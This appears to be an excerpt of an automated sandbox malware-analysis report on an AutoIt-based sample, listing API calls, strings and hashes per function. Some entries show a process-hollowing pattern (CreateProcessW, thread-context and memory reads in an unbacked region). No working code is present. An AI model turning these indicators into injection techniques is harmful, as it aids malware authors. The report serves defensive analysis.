                                                          • Instruction Fuzzy Hash: 5A21C7B6901718AFDB01EFA4ED49BDEBBF9FB08700F00812AF911E62A0D7B155548F95

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00344864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004052F8,?,003437C0,?), ref: 00344882
                                                            • Part of subcall function 0036068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,003472C5), ref: 003606AD
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00347308
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0037EC21
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0037EC62
                                                          • RegCloseKey.ADVAPI32(?), ref: 0037ECA0
                                                          • _wcscat.LIBCMT ref: 0037ECF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: 3b8cfc16117c671ffc44bd47d4d85c14b4323ba3961f5b2cd678407bdc54f2e2
                                                          • Instruction ID: 6c0ffb134121eb197a6c7b524966d79ececc9e69d9eb2b2571f8eb8670409fab
                                                          • Opcode Fuzzy Hash: 3b8cfc16117c671ffc44bd47d4d85c14b4323ba3961f5b2cd678407bdc54f2e2
                                                          • Instruction Fuzzy Hash: 0271AF714093019EC316EF25ED8189BBBE8FF88350F41497EF446EB1A0DB70A958CB95

                                                          Control-flow Graph

                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 003436D2
                                                          • KillTimer.USER32(?,00000001), ref: 003436FC
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0034371F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0034372A
                                                          • CreatePopupMenu.USER32 ref: 0034373E
                                                          • PostQuitMessage.USER32(00000000), ref: 0034375F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated$%=
                                                          • API String ID: 129472671-273969447
                                                          • Opcode ID: e04cfd2a28fa16bb30b8295fddf24a61856be4fa4d4b794b74af01336d75f1b2
                                                          • Instruction ID: e1f9b9c28e5dd6258b65386e91a878a1f57b59d30e338d749aaa871b10b2950f
                                                          • Opcode Fuzzy Hash: e04cfd2a28fa16bb30b8295fddf24a61856be4fa4d4b794b74af01336d75f1b2
                                                          • Instruction Fuzzy Hash: E84138B2100506ABDF176F24DD49B7A3BD9EB00340F164139F902EF2A2CA78BE109B65

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00343A62
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00343A71
                                                          • LoadIconW.USER32(00000063), ref: 00343A88
                                                          • LoadIconW.USER32(000000A4), ref: 00343A9A
                                                          • LoadIconW.USER32(000000A2), ref: 00343AAC
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00343AD2
                                                          • RegisterClassExW.USER32(?), ref: 00343B28
                                                            • Part of subcall function 00343041: GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                            • Part of subcall function 00343041: RegisterClassExW.USER32(00000030), ref: 0034309E
                                                            • Part of subcall function 00343041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                            • Part of subcall function 00343041: InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                            • Part of subcall function 00343041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                            • Part of subcall function 00343041: LoadIconW.USER32(000000A9), ref: 003430F2
                                                            • Part of subcall function 00343041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: f6d95a2884ccdef645326f070bc1bc92b648e3b422d36e84e65d8d8cd157c122
                                                          • Instruction ID: ce0bf8a9837475377d76a134b975d161a894a3eef860f1c08f12a387609a8346
                                                          • Opcode Fuzzy Hash: f6d95a2884ccdef645326f070bc1bc92b648e3b422d36e84e65d8d8cd157c122
                                                          • Instruction Fuzzy Hash: 95213974910308EFEB11DFA4EE09B9E7FF5EB08711F00016AE504BA2A1D3B566508F88

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R@
                                                          • API String ID: 1825951767-3808460316
                                                          • Opcode ID: 6bcd42f591988631099c485afcb14939d23a8e28c2a1b11bcc6edf83428ee21f
                                                          • Instruction ID: 34ceca09aecce96ca516d573303ff180aa8beb13a1fc70ae3a4a728da1d7cda3
                                                          • Opcode Fuzzy Hash: 6bcd42f591988631099c485afcb14939d23a8e28c2a1b11bcc6edf83428ee21f
                                                          • Instruction Fuzzy Hash: 56A142768112199ADF16EBA0CC96EEEB7B8FF14300F44442AF416BF191DF756A09CB60

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00360313
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 0036031B
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00360326
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00360331
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00360339
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00360341
                                                            • Part of subcall function 00356259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0034FA90), ref: 003562B4
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0034FB2D
                                                          • OleInitialize.OLE32(00000000), ref: 0034FBAA
                                                          • CloseHandle.KERNEL32(00000000), ref: 00384921
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID: <W@$\T@$%=$S@
                                                          • API String ID: 1986988660-3831757665
                                                          • Opcode ID: f227eb1154d3664fa5d31c73ee641d61c9210437c7975db4c1a229facfb4a90d
                                                          • Instruction ID: 17598c15472027f5dbbf4bb0b39b9d81682bf663f2ed53310292458533ba81eb
                                                          • Opcode Fuzzy Hash: f227eb1154d3664fa5d31c73ee641d61c9210437c7975db4c1a229facfb4a90d
                                                          • Instruction Fuzzy Hash: A981B0B0911A408FC785EF39AE4979B7BE5FB88306750813AD419EB272EB744884CF1D

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 024E26C1
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 024E28E7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                          • Instruction ID: a8a3fc25e09bef5cb0fa4831a756b827b7ec8dc2dae32011b7356231fbac3b82
                                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                          • Instruction Fuzzy Hash: 59A11A74E00209EBEF14CFA4C855BEEB7B5BF48705F10865AE512BB280D7B59A85CF50

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00343A15
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343A36
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00343A4A
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00343A53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: 208c17a5ef6ba46f661b39db14d1884826d82dc76a4d4d5b4efc01fca6bfb1c1
                                                          • Instruction ID: 4cddf0b51f4a1c5ddd6490b280d254647f40bd5fa17dda66e96a57cc2ac13fdb
                                                          • Opcode Fuzzy Hash: 208c17a5ef6ba46f661b39db14d1884826d82dc76a4d4d5b4efc01fca6bfb1c1
                                                          • Instruction Fuzzy Hash: 4DF01770500294BEEA2157236C0CE6B2E7EDBC6F50F00407EB904F2160C2751C10CEB4

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 024E22A0: Sleep.KERNELBASE(000001F4), ref: 024E22B1
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E24E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: WN8LG0D0OQIQ7L438
                                                          • API String ID: 2694422964-2893018241
                                                          • Opcode ID: ce5b878b1b0c0a5e4fc97e0af66cad9dbebad6d8f810168ac6c811cf96933d1a
                                                          • Instruction ID: 7769cd89b44792c6696d899733d51a2f3d0eea9fb1496eba6aaa0acb38fd8c62
                                                          • Opcode Fuzzy Hash: ce5b878b1b0c0a5e4fc97e0af66cad9dbebad6d8f810168ac6c811cf96933d1a
                                                          • Instruction Fuzzy Hash: 49518070D04248EBEF11DBA4C858BEEBB79AF18301F004199E649BB2C0D7B91B45CB65

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00344F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344F6F
                                                          • _free.LIBCMT ref: 0037E5BC
                                                          • _free.LIBCMT ref: 0037E603
                                                            • Part of subcall function 00346BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00346D0D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                          • API String ID: 2861923089-1757145024
                                                          • Opcode ID: e0ca428707c9bee0373e0e6626cfc32247b9c72b53571ffe11e0792c3c6da93c
                                                          • Instruction ID: 5aa8cf826cb924b95371b102280627894fe0eb4642fbcfe7a44b0545423b7f99
                                                          • Opcode Fuzzy Hash: e0ca428707c9bee0373e0e6626cfc32247b9c72b53571ffe11e0792c3c6da93c
                                                          • Instruction Fuzzy Hash: AC915D71910219AFCF16EFA5CC919EDB7B8FF09314B148469F815AF2A1EB34AD05CB50
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003435A1,SwapMouseButtons,00000004,?), ref: 003435D4
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003435A1,SwapMouseButtons,00000004,?,?,?,?,00342754), ref: 003435F5
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,003435A1,SwapMouseButtons,00000004,?,?,?,?,00342754), ref: 00343617
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 55bb9b9100de5c1241f49691d31da5453977616c824d9726acc3d3927f329b0c
                                                          • Instruction ID: de96766eb7374da28f2e1b2bc7a95a09846b954bf061f96a978116487ca974c0
                                                          • Opcode Fuzzy Hash: 55bb9b9100de5c1241f49691d31da5453977616c824d9726acc3d3927f329b0c
                                                          • Instruction Fuzzy Hash: EF114571614219BFDB229F64DC80EAEBBFDEF04740F128469E805DB210E275AE409BA0
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 024E1A5B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 024E1AF1
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024E1B13
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: ec40cea32e34b77dc66852b254e16eb814eeb5cb53dbe13a3b9b961a1e41453f
                                                          • Instruction ID: ae0f34013d5516d6264cbc80c22f7b01cf392e4f5258920f168c91706bf27bbf
                                                          • Opcode Fuzzy Hash: ec40cea32e34b77dc66852b254e16eb814eeb5cb53dbe13a3b9b961a1e41453f
                                                          • Instruction Fuzzy Hash: DD620B30A14258DBEB24DFA4C850BEEB376EF58301F1091A9D10DEB394E7B59E81CB59
                                                          APIs
                                                            • Part of subcall function 00345045: _fseek.LIBCMT ref: 0034505D
                                                            • Part of subcall function 003A97DD: _wcscmp.LIBCMT ref: 003A98CD
                                                            • Part of subcall function 003A97DD: _wcscmp.LIBCMT ref: 003A98E0
                                                          • _free.LIBCMT ref: 003A974B
                                                          • _free.LIBCMT ref: 003A9752
                                                          • _free.LIBCMT ref: 003A97BD
                                                            • Part of subcall function 00362ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00369BA4), ref: 00362EE9
                                                            • Part of subcall function 00362ED5: GetLastError.KERNEL32(00000000,?,00369BA4), ref: 00362EFB
                                                          • _free.LIBCMT ref: 003A97C5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID:
                                                          • API String ID: 1552873950-0
                                                          • Opcode ID: e7380544773663296b0c3136f1e3976d6f6c9a32d6817a33089202c8b0d22308
                                                          • Instruction ID: 1878952d0d7245678585fb592a798164e0db18802e8f600f2e455a4fc2fe9b49
                                                          • Opcode Fuzzy Hash: e7380544773663296b0c3136f1e3976d6f6c9a32d6817a33089202c8b0d22308
                                                          • Instruction Fuzzy Hash: 215162B1D04618AFDF259F64CC85B9EBBB9EF48310F1044AEF609AB251DB715980CF58
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                          • Instruction ID: 173cdcc6029f3293f04f66e9a7a3bb33739437ef2259d4acf3f70dd97549146b
                                                          • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                          • Instruction Fuzzy Hash: 09410631F047069FDB1A9F69C8809AF7BEAAF46360B24C63DE855CB648D771DD808B40
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: AU3!P/=$EA06
                                                          • API String ID: 4104443479-3802933467
                                                          • Opcode ID: 8e21ef0cc37d8c84c5e15596e64a6121a38d6ac0b9154e9d3a86dec5b8fbaf34
                                                          • Instruction ID: 58ab9574c87cde04a232d02a93e673ccb6fc7d03e8330220a8084e1c43689d1c
                                                          • Opcode Fuzzy Hash: 8e21ef0cc37d8c84c5e15596e64a6121a38d6ac0b9154e9d3a86dec5b8fbaf34
                                                          • Instruction Fuzzy Hash: 85415D61A041585BDF239F64C8517BF7BE6AF05300F698075F882AF183C625BDC597E1
                                                          APIs
                                                          • _memset.LIBCMT ref: 0037ED92
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0037EDDC
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                            • Part of subcall function 00360911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00360930
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 4671b835eb374a1b235267d98c5ddb9d205c79368298cc4cf5158dc99d0c26f8
                                                          • Instruction ID: b0ae053e8b805b5c883f2522cce0ea6dd7cdfbb43c3cf2fb6f31316445679165
                                                          • Opcode Fuzzy Hash: 4671b835eb374a1b235267d98c5ddb9d205c79368298cc4cf5158dc99d0c26f8
                                                          • Instruction Fuzzy Hash: 6F21A431A0025C9BDF169F94C845BEE7BF99F49704F008059E508AF241DBB469498F91
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 003A99A1
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003A99B8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 20cb189f165e890caa742136586d450f31f66aa90a818eb7c28f59e7128a12f3
                                                          • Instruction ID: e5731f6acfb206bc074afbace39c3bc9ef32a5bc54be1774bb184427ea3c021b
                                                          • Opcode Fuzzy Hash: 20cb189f165e890caa742136586d450f31f66aa90a818eb7c28f59e7128a12f3
                                                          • Instruction Fuzzy Hash: 08D05B7954030D6FDB519B90DC0DFEA773CD704700F0006B1FB54D1091DA7065548B91
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3feef706215629c2dc94d3fa7170881c6f675fcbd8b8892affd1358ff9d208a
                                                          • Instruction ID: d4b85e3adca88cee5777275d07c6590ce0eac7474b45cb3007fd1dbe2585bbed
